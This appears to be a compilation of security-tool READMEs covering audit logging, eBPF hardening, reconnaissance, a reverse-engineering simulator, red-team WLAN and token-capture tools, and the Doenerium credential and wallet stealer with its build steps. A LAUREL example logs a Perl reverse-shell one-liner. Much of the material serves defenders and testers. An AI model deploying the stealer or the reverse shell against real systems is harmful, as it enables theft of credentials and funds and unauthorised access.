{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

This happens at the source. The generated event even contains useful information about the spawning process:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

A word about audit rules

A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event record are not suppressed, so rules like

-a always,exclude -F msgtype=EOE

should be removed.

Events with context

Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id points to the message corresponding to the last execve syscall for this process:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}

Adding more context: Keys and process labels

Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as keys to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.

Consider the following rule that set keys for apt and dpkg invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let's configure LAUREL to turn the software_mgmt key into a process label that is propagated to child processes:

Together with a ruleset that logs execve(2) and variants, this will cause every event directly caused by apt-get and its subprocesses to be labelled software_mgmt.

For example, running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_gmt can be observed in LAUREL's audit log:

  • apt-get update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.

Installation

See INSTALL.md.

License

GNU General Public License, version 3

Authors

The logo was created by Birgit Meyer <hello@biggi.io>.



Bpflock - eBPF Driven Security For Locking And Auditing Linux Machines


bpflock - eBPF driven security for locking and auditing Linux machines.

Note: bpflock is currently in experimental stage, it may break, options and security semantics may change, some BPF programs will be updated to use Cilium ebpf library.


1. Introduction

bpflock uses eBPF to strength Linux security. By restricting access to a various range of Linux features, bpflock is able to reduce the attack surface and block some well known attack techniques.

Only programs like container managers, systemd and other containers/programs that run in the host pid and network namespaces are allowed access to full Linux features, containers and applications that run on their own namespace will be restricted. If bpflock bpf programs run under the restricted profile then all programs/containers including privileged ones will have their access denied.

bpflock protects Linux machines by taking advantage of multiple security features including Linux Security Modules + BPF.

Architecture and Security design notes:

  • bpflock is not a mandatory access control labeling solution, and it does not intent to replace AppArmor, SELinux, and other MAC solutions. bpflock uses a simple declarative security profile.
  • bpflock offers multiple small bpf programs that can be reused in multiple contexts from Cloud Native deployments to Linux IoT devices.
  • bpflock is able to restrict root from accessing certain Linux features, however it does not protect against evil root.

2. Functionality Overview

2.1 Security features

bpflock offer multiple security protections that can be classified as:

2.2 Semantics

bpflock keeps the security semantics simple. It support three global profiles to broadly cover the security sepctrum, and restrict access to specific Linux features.

  • profile: this is the global profile that can be applied per bpf program, it takes one of the followings:

    • allow|none|privileged : they are the same, they define the least secure profile. In this profile access is logged and allowed for all processes. Useful to log security events.
    • baseline : restrictive profile where access is denied for all processes, except privileged applications and containers that run in the host namespaces, or per cgroup allowed profiles in the bpflock_cgroupmap bpf map.
    • restricted : heavily restricted profile where access is denied for all processes.
  • Allowed or blocked operations/commands:

    Under the allow|privileged or baseline profiles, a list of allowed or blocked commands can be specified and will be applied.

    • --protection-allow : comma-separated list of allowed operations. Valid under baseline profile, this is useful for applications that are too specific and perform privileged operations. It will reduce the use of the allow | privileged profile, so instead of using the privileged profile, we can specify the baseline one and add a set of allowed commands to offer a case-by-case definition for such applications.
    • --protection-block : comma-separated list of blocked operations. Valid under allow|privileged and baseline profiles, it allows to restrict access to some features without using the full restricted profile that might break some specific applications. Using baseline or privileged profiles opens the gate to access most Linux features, but with the --protection-block option some of this access can be blocked.

For bpf security examples check bpflock configuration examples

3. Deployment

3.1 Prerequisites

bpflock needs the following:

  • Linux kernel version >= 5.13 with the following configuration:

    Obviously a BTF enabled kernel.

    Enable BPF LSM support

    If your kernel was compiled with CONFIG_BPF_LSM=y check the /boot/config-* to confirm, but when running bpflock it fails with:

    must have a kernel with 'CONFIG_BPF_LSM=y' 'CONFIG_LSM=\"...,bpf\"'"

    Then to enable BPF LSM as an example on Ubuntu:

    1. Open the /etc/default/grub file as privileged of course.
    2. Append the following to the GRUB_CMDLINE_LINUX variable and save.
      "lsm=lockdown,capability,yama,apparmor,bpf"
      or
      GRUB_CMDLINE_LINUX="lsm=lockdown,capability,yama,apparmor,bpf"
    3. Update grub config with:
      sudo update-grub2
    4. Reboot into your kernel.

    3.2 Docker deployment

    To run using the default allow or privileged profile (the least secure profile):

    docker run --name bpflock -it --rm --cgroupns=host \
    --pid=host --privileged \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Fileless Binary Execution

    To log and restict fileless binary execution run with:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_FILELESSLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    When running under restricted profile, the container logs will display:

    Running under the restricted profile may break things, this is why the default profile is allow.

    Kernel Modules Protection

    To apply Kernel Modules Protection run with environment variable BPFLOCK_KMODLOCK_PROFILE=baseline or BPFLOCK_KMODLOCK_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KMODLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example:

    $ sudo unshare -p -n -f
    # modprobe xfs
    modprobe: ERROR: could not insert 'xfs': Operation not permitted
    Kernel Image Lock-down

    To apply Kernel Image Lock-down run with environment variable BPFLOCK_KIMGLOCK_PROFILE=baseline:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KIMGLOCK_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock
    $ sudo unshare -f -p -n bash
    # head -c 1 /dev/mem
    head: cannot open '/dev/mem' for reading: Operation not permitted
    BPF Protection

    To apply bpf restriction run with environment variable BPFLOCK_BPFRESTRICT_PROFILE=baseline or BPFLOCK_BPFRESTRICT_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_BPFRESTRICT_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example running in a different pid and network namespaces and using bpftool:

    $ sudo unshare -f -p -n bash
    # bpftool prog
    Error: can't get next program: Operation not permitted
    Running with the -e "BPFLOCK_BPFRESTRICT_PROFILE=restricted" profile will deny bpf for all:
    3.3 Configuration and Environment file

    Passing configuration as bind mounts can be achieved using the following command.

    Assuming bpflock.yaml and bpf.d profiles configs are in current directory inside bpflock directory, then we can just use:

    ls bpflock/
    bpf.d bpflock.d bpflock.yaml
    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -v $(pwd)/bpflock/:/etc/bpflock \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Passing environment variables can also be done with files using --env-file. All parameters can be passed as environment variables using the BPFLOCK_$VARIABLE_NAME=VALUE format.

    Example run with environment variables in a file:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    --env-file bpflock.env.list \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    4. Documentation

    Documentation files can be found here.

    5. Build

    bpflock uses docker BuildKit to build and Golang to make some checks and run tests. bpflock is built inside Ubuntu container that downloads the standard golang package.

    Run the following to build the bpflock docker container:

    git submodule update --init --recursive
    make

    Bpf programs are built using libbpf. The docker image used is Ubuntu.

    If you want to only build the bpf programs directly without using docker, then on Ubuntu:

    sudo apt install -y pkg-config bison binutils-dev build-essential \
    flex libc6-dev clang-12 libllvm12 llvm-12-dev libclang-12-dev \
    zlib1g-dev libelf-dev libfl-dev gcc-multilib zlib1g-dev \
    libcap-dev libiberty-dev libbfd-dev

    Then run:

    make bpf-programs

    In this case the generated programs will be inside the ./bpf/build/... directory.

    Credits

    bpflock uses lot of resources including source code from the Cilium and bcc projects.

    License

    The bpflock user space components are licensed under the Apache License, Version 2.0. The BPF code where it is noted is licensed under the General Public License, Version 2.0.



Doenerium - Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)


Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

Features

Stealer

  • Discord Token
  • Discord Info - Username, Phone number, Email, Billing, Nitro Status & Backup Codes
  • Discord Friends with rare badges
  • Grabs crypto wallets
    • Zcash
    • Armory
    • Bytecoin
    • Jaxx
    • Exodus
    • Ethereum
    • Electrum
    • AtomicWallet
    • Guarda
    • Coinomi
  • Browser (Chrome, Opera, Firefox, OperaGX, Edge, Brave, Yandex) - Passwords, Cookies, Autofill & History (Searches for specific keywords such as PayPal, Coinbase etc. in them)
  • Screenshot(s)
  • Injects itself to discord to grab token when changed

 

Additional

  • Crypto Clipper - BTC, LTC, XMR, ETH, XRP, NEO, BCH, DOGE, DASH, XLM
  • Ultra Obfuscation (use https://obfuscator.io)
  • Anti-Debug
  • Anti-VM
  • Validates a found discord token and then sends it to your discord webhook
  • Sends all files to your discord webhook in beautiful embeds and a structured zip filE

 

Screenshots









  Setting Up

Install Node.js

Install Visual studio with C++ compilers and all enabled (is a bit gigs but u wont have errors)

Run install.bat file to install all necessary files

Replace WEBHOOK with your webhook in config.js

Run build.bat and wait for doenerium-win.exe to be built.

Todo

  • Exodus wallet injection (get the password whenever the user logs in the wallet)
  • More grabbers (VPN's, Gaming, Messengers)
  • Keylogger
  • Growtopia stealer
  • Discord bot to build within discord ($build <webhook_url>)
  • Dynamic encryption

License

By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info see commonsclause

Note

There is no official telegram server of this project. I don't own t.me/doenerium

I am not responsible for any damages this software may cause. This was made for personal education.

Credits

Credits to Pandoric / PandoricGalaxy for creating this beautiful README file



modDetective - Tool That Chronologizes Files Based On Modification Time In Order To Investigate Recent System Activity


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTF's in order to pinpoint where escalation and attack vectors may exist.


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. (1)

To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).

What is modDetective Doing?

modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT for the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification times of each file, then orders these modification times in order to output them chronologically.

Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "Indicators of User Activity," Since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.

Requirements

modDetective currently works only with python3; python2 compatability will be completed shortly (hence the lack of f strings). Standard libraries should be fine.



LiveTargetsFinder - Generates Lists Of Live Hosts And URLs For Targeting, Automating The Usage Of MassDNS, Masscan And Nmap To Filter Out Unreachable Hosts And Gather Service Information


Generates lists of live hosts and URLs for targeting, automating the usage of Massdns, Masscan and nmap to filter out unreachable hosts

Given an input file of domain names, this script will automate the usage of MassDNS to filter out unresolvable hosts, and then pass the results on to Masscan to confirm that the hosts are reachable and on which ports. The script will then generate a list of full URLs to be used for further targeting (passing into tools like gobuster or dirsearch, or making HTTP requests), a list of reachable domain names, and a list of reachable IP addresses. As an optional last step, you can run an nmap version scan on this reduced host list, verifying that the earlier reachable hosts are up, and gathering service information from their open ports.


Overview

This script is especially useful for large domain sets, such as subdomain enumerations gathered from an apex domain with thousands of subdomains. With these large lists, an nmap scan would simply take too long. The goal here is to first use the less accurate, but much faster, MassDNS to quickly reduce the size of your input list by removing unresolvable domains. Then, Masscan will be able to take the output from MassDNS, and further confirm that the hosts are reachable, and on which ports. The script will then parse these results and generate lists of the live hosts discovered.

Now, the list of hosts should be reduced enough to be suitable for further scanning/testing. If you want to go a step further, you can tell the script to run an nmap scan on the list of reachable hosts, which should take more reasonable amount of time with the shorter list of hosts. After running nmap, any false positives given from Masscan will be filtered out. Raw nmap output will be stored in the regular nmap XML format, and additional information from the version detection will be added to a SQLite database.

Installation

If using the nmap scan option, this tool assumes that you already have nmap installed

Note: Running the install script is only needed if you do not already have MassDNS and Masscan installed, or if you would like to reinstall them inside this repo. If you do not run the script, you can provide the paths to the respective executables as arguments. The script additionally expects that the resolvers list included with MassDNS be located at {massDNS_directory}/lists/resolvers.txt.

git clone https://github.com/allyomalley/LiveTargetsFinder.git
cd LiveTargetsFinder
sudo pip3 install -r requirements.txt

(OPTIONAL)

chmod +x install_deps.sh
./install_deps.sh

If you do not already have MassDNS and Masscan installed, and would prefer to install them yourself, see the documentation for instructions:

MassDNS

Masscan

I have only tested this script on macOS and Linux - the python script itself should work on a Windows machine, though I believe the installation for MassDNS and Masscan will differ.

Usage

python3 liveTargetsFinder.py [domainList] [options]
Flag Description Default Required
                --target-list                 Input file containing list of domains, e.g google.com Yes
  --massdns-path   Path to the MassDNS executable, if non-default ./massdns/bin/massdns No
  --masscan-path   Path to the Masscan executable, if non-default ./masscan/bin/masscan No
  --nmap   Run an nmap version detection scan on the gathered live hosts Disabled No
  --db-path   If using the --nmap option, supply the path to the database you would like to append to (will be created if does not exist) output/liveTargetsFinder.sqlite3 No
  • Note that the Masscan and MassDNS settings are hardcoded inside liveTargetsFinder.py. Feel free to edit them (lines 87 + 97).
  • Since this tool was designed with very large lists in mind, I tweaked many of the settings to try to balance speed, accuracy, and network constraints - these can all be adjusted to suit your needs and bandwith.
  • Default settings for Masscan only scans ports 80 and 443.
    • -s, (--hashmap-size) in particular was chosen for performance reasons - you will likely be able to increase this.
    • Full MassDNS arguments:
      • -c 25 -o J -r ./massdns/lists/resolvers.txt -s 100 -w massdnsOutput -t A targetHosts
      • Documentation
  • Another setting of note is the --max-rate argument for Masscan - you will likely want to adjust this.
    • Full Masscan arguments:
      • -iL ipFile -oD masscanOutput --open-only --max-rate 5000 -p80,443 --max-retries 10
      • Documentation
  • Default nmap settings only scans ports 80 and 443, with timing -T4 and a few NSE scripts.
    • Full nmap arguments:
      • --script http-server-header.nse,http-devframework.nse,http-headers -sV -T4 -p80,443 -oX {output.xml}

Example

Did run install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt

Did NOT run the install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt --massdns-path ../massdns/bin/massdns --masscan-path ../masscan/bin/masscan 

Perform an nmap scan and write to/append to the default DB path (liveTargetsFinder.sqlite3)

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap

Perform an nmap scan and write to/append to the specified database

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap --db-path serviceinfo_victim.sqlite3

Output

Input: victimDomains.txt

File Description Examples
output/victimDomains_targetUrls.txt List of reachable, live URLs https://github.com, http://github.com
output/victimDomains_domains_alive.txt List of live domain names github.com, google.com
output/victimDomains_ips_alive.txt List of live IP addresses 10.1.0.200, 52.3.1.166
Supplied or default DB Path SQLite database storing live hosts and information about their services running
output/victimDomains_massdns.txt The raw output from MassDNS, in ndjson format
output/victimDomains_masscan.txt The raw output from Masscan, in ndjson format
output/victimDomains_nmap.txt The raw output from nmap, in XML format


RESim - Reverse Engineering Software Using A Full System Simulator


Reverse engineering using a full system simulator.

  • Dynamic analysis by instrumenting simulated hardware using Simics
  • Trace process trees, system calls and individual programs
  • Reverse execution to selected breakpoints and events
  • Integrated with IDA Pro(tm) debugging client
  • Fuzz with a customized AFL, injecting directly into simulated memory
RESim is a dynamic system analysis tool that provides detailed insight into processes, programs and data flow within networked computers. RESim simulates networks of computers through use of the Simics'[1] platform’s high fidelity models of processors, peripheral devices (e.g., network interface cards), and disks. The networked simulated computers load and run targeted software copied from images extracted from the physical systems being modeled.

Broadly, RESim aids reverse engineering and vulnerability analysis of networks of Linux-based systems by inventorying processes in terms of the programs they execute and the data they consume. Data sources include files, device interfaces and inter-process communication mechanisms. Process execution and data consumption is documented through dynamic analysis of a running simulated system without installation or injection of software into the simulated system, and without detailed knowledge of the kernel hosting the processes.

RESim also provides interactive visibility into individual executing programs through use of a custom plug-in to the IDA Pro disassembler/debugger. The disassembler/debugger allows setting breakpoints to pause the simulation at selected events in either future time, or past time. For example, RESim can direct the simulation state to reverse until the most recent modification of a selected memory address.
Reloadable checkpoints may be generated at any point during system execution.
A RESim simulation can be paused for inspection, e.g., when a specified process is scheduled for execution, and subsequently continued, potentially with altered memory or register state. The analyst can explicitly modify memory or register content, and can also dynamically augment memory based on system events, e.g., change a password file entry when read by the su program.

Analysis is performed entirely through observation of the simulated target system’s memory and processor state, without need for shells, software injection, or kernel symbol tables. The analysis is said to be external because the analysis observation functions have no effect on the state of the simulated system.

RESim has been integrated with the American Fuzzing Lop (AFL) fuzzer. This fuzzing system injects fuzzed data directly into the application read buffer, simplifying the fuzzing setup and workflow. RESim automatically replays and analyzes any detected crashes, identifying the causes of crashes, e.g., corruption of execution control.

Please refer to the RESim User's Guide for additional information. A brief demonstration of RESim can be seen here: (https://nps.box.com/s/rf3n104ualg38pon6b7fm6m6wqk9zz50)

RESim is based on a software vetting and forensic analysis platform created for the DARPA Cyber Grand Challenge. That repo is here: https://github.com/mfthomps/cgc-monitor. A paper describing that work is at https://www.sciencedirect.com/science/article/pii/S1742287618301920 And a fine summary of the use of Simics in the CGC Monitor is at https://software.intel.com/content/www/us/en/develop/blogs/simics-software-automates-cyber-grand-challenge-validation.html

[1]Simics is a full system simulator sold by Wind River, which holds all relevant trademarks.



Cdb - Automate Common Chrome Debug Protocol Tasks To Help Debug Web Applications From The Command-Line And Actively Monitor And Intercept HTTP Requests And Responses


Pown CDB is a Chrome Debug Protocol utility. The main goal of the tool is to automate common tasks to help debug web applications from the command-line and actively monitor and intercept HTTP requests and responses. This is particularly useful during penetration tests and other types of security assessments and investigations.


Credits

This tool is part of secapps.com open-source initiative.

  ___ ___ ___   _   ___ ___  ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com

Authors

Quickstart

This tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.

Install Pown first as usual:

$ npm install -g pown@latest

Invoke directly from Pown:

$ pown cdb

Library Use

Install this module locally from the root of your project:

$ npm install @pown/cdb --save

Once done, invoke pown cli:

$ POWN_ROOT=. ./node_modules/.bin/pown-cli cdb

You can also use the global pown to invoke the tool locally:

$ POWN_ROOT=. pown cdb

Usage

WARNING: This pown command is currently under development and as a result will be subject to breaking changes.

pown cdb <command>

Chrome Debug Protocol Tool

Commands:
pown cdb launch Launch server application such as chrome, firefox, opera and edge [aliases: start]
pown cdb navigate <url> Go to the specified url [aliases: goto, go]
pown cdb network Chrome Debug Protocol Network Monitor [aliases: net, sniff, proxy, mon, monitor]
pown cdb cookies Dump current page cookies [aliases: cookie]
pown cdb screenshot <file> Screenshot the current page [aliases: capture, shoot, shot]

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown cdb launch

pown cdb launch

Launch server application such as chrome, firefox, opera and edge

Options:
--version Show version number [boolean]
--help Show help [boolean]
--port, -p Remote debugging port [number] [default: 9222]
--xss-auditor, -x Turn on/off XSS auditor [boolean] [default: true]
--certificate-errors, -c Turn on/off certificate errors [boolean] [default: true]
--pentest, -t Start with prefered settings for pentesting [boolean] [default: false]

pown cdb navigate

pown cdb network
pown cdb cookies
pown cdb screenshot
Tutorials

Web Application Security Assessment

Let's explore how to use Pown CDB during a typical web app security engagments.

First, ensure that you have the latest pown installed:

$ npm install -g pown

If you have pown installed, make sure you have the latest version:

$ pown update

To get started with Pown CDB we need a Chrome browser instance (other browsers are also supported) with chrome debug remote interface enabled and listening on localhost:

$ pown cdb launch --port 9333

Once the chrome browser instance is running, hook it with pown cdb network utility:

$ pown cdb network --port 9333 -b

The -b flag is used to start Pown CDB with a curses-based user interface:


Use key-combo shift + ? to get a list of available shortcuts:


As soon as you start using the browser, Pown CDB will record and display the traffic in the user interface. To intercept requests use key-combo ctrl + t.


Requests are captured and opened in your default shell editor ($EDITOR). Make the desired changes, save and quit. The original request will be replaced with your changes.



Pinecone - A WLAN Red Team Framework


Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.

This tool is designed for educational and research purposes only. Only use it with explicit permission.


Installation

For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:

  • Python 3.5+. Your distribution probably comes with Python3 already installed, if not it can be installed using apt-get install python3.
  • dnsmasq (tested with version 2.76). Can be installed using apt-get install dnsmasq.
  • hostapd-wpe (tested with version 2.6). Can be installed using apt-get install hostapd-wpe. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.

After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt in the project root folder.

Usage

For starting Pinecone, execute python3 pinecone.py from within the project root folder:

root@kali:~/pinecone# python pinecone.py 
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >

Pinecone is controlled via a Metasploit-like command-line interface. You can type help to get the list of available commands, or help 'command' to get more information about a specific command:

pinecone > help

Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias

Undocumented commands:
======================
back run stop

pinecone > help use
Usage: use module [-h]

Interact with the specified module.

positional arguments:
module module ID

optional arguments:
-h, --help show this help message and exit

Use the command use 'moduleID' to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:

pinecone > use 
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >

Every module has options, that can be seen typing help run or run --help when a module is activated. Most modules have default values for their options (check them before running):

pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)

When a module is activated, you can use the run [options...] command to start its functionality. The modules provide feedback of their execution state:

pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...

If the module runs in background (for example, scripts/infrastructure/ap), you can stop it using the stop command when the module is running:

When you are done using a module, you can deactivate it by using the back command. You can also activate another module issuing the use command again.

Shell commands may be executed with the command shell or the ! shortcut:

pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md

Currently, Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the tmp/ directory also under the project root folder.



Koh - The Token Stealer


Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.

Some code was inspired by Elad Shamir's Internal-Monologue project (no license), as well as KB180548. For why this is possible and Koh's approeach, see the Technical Background section of this README.

For a deeper explanation of the motivation behind Koh and its approach, see the Koh: The Token Stealer post.

@harmj0y is the primary author of this code base. @tifkin_ helped with the approach, BOF implementation, and some token mechanics.

Koh is licensed under the BSD 3-Clause license.


Koh Server

The Koh "server" captures tokens and uses named pipes for control/communication. This can be wrapped in Donut and injected into any high-integrity SYSTEM process (see The Inline Shenanigans Bug).

Compilation

We are not planning on releasing binaries for Koh, so you will have to compile yourself :)

Koh has been built against .NET 4.7.2 and is compatible with Visual Studio 2019 Community Edition. Simply open up the project .sln, choose "Release", and build. The Koh.exe assembly and Koh.bin Donut-built PIC will be output to the main directory. The Donut blob is both x86/x64 compatible, and is built with the following options using v0.9.3 of Donut at ./Misc/Donut.exe:

  [ Instance type : Embedded
[ Entropy : Random names + Encryption
[ Compressed : Xpress Huffman
[ File type : .NET EXE
[ Parameters : capture
[ Target CPU : x86+amd64
[ AMSI/WDLP : abort

Donut's license is BSD 3-clause.

Usage

Koh.exe Koh.exe <list | monitor | capture> [GroupSID... GroupSID2 ...]

  • list - lists (non-network) logon sessions
  • monitor - monitors for new/unique (non-network) logon sessions
  • capture - captures one unique token per SID found for new (non-network) logon sessions

Group SIDs can be supplied command line as well, causing Koh to monitor/capture only logon sessions that contain the specified group SIDs in their negotiated token information.

Example - Listing Logon Sessions

C:\Temp>Koh.exe list

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: list

[*] Elevated to SYSTEM


[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Origin LUID : 1677733 (0x1999a5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\DA
LUID : 81492608
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Example - Monitoring for Logon Sessions (with group SID filtering)

Only lists results that have the domain admins (-512) group SID in their token information:

C:\Temp>Koh.exe monitor S-1-5-21-937929760-3187473010-80948926-512

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: monitor

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM

[*] Targeting group SIDs:
S-1-5-21-937929760-3187473010-80948926-512

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\DA
LUID : 81492608
Lo gonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Koh Client

The current usable client is a Beacon Object File at .\Clients\BOF\. Load the .\Clients\BOF\KohClient.cna aggressor script in your Cobalt Strike client to enable BOF control of the Koh server. The only requirement for using captured tokens is SeImpersonatePrivilege. The communication named pipe has an "Everyone" DACL but uses a basic shared password (super securez).

To compile fresh on Linux using Mingw, see the .\Clients\BOF\build.sh script. The only requirement (on Debian at least) should be apt-get install gcc-mingw-w64

Usage

beacon> help koh
koh list - lists captured tokens
koh groups LUID - lists the group SIDs for a captured token
koh filter list - lists the group SIDs used for capture filtering
koh filter add SID - adds a group SID for capture filtering
koh filter remove SID - removes a group SID from capture filtering
koh filter reset - resets the SID group capture filter
koh impersonate LUID - impersonates the captured token with the give LUID
koh release all - releases all captured tokens
koh release LUID - releases the captured token for the specified LUID
koh exit - signals the Koh server to exit

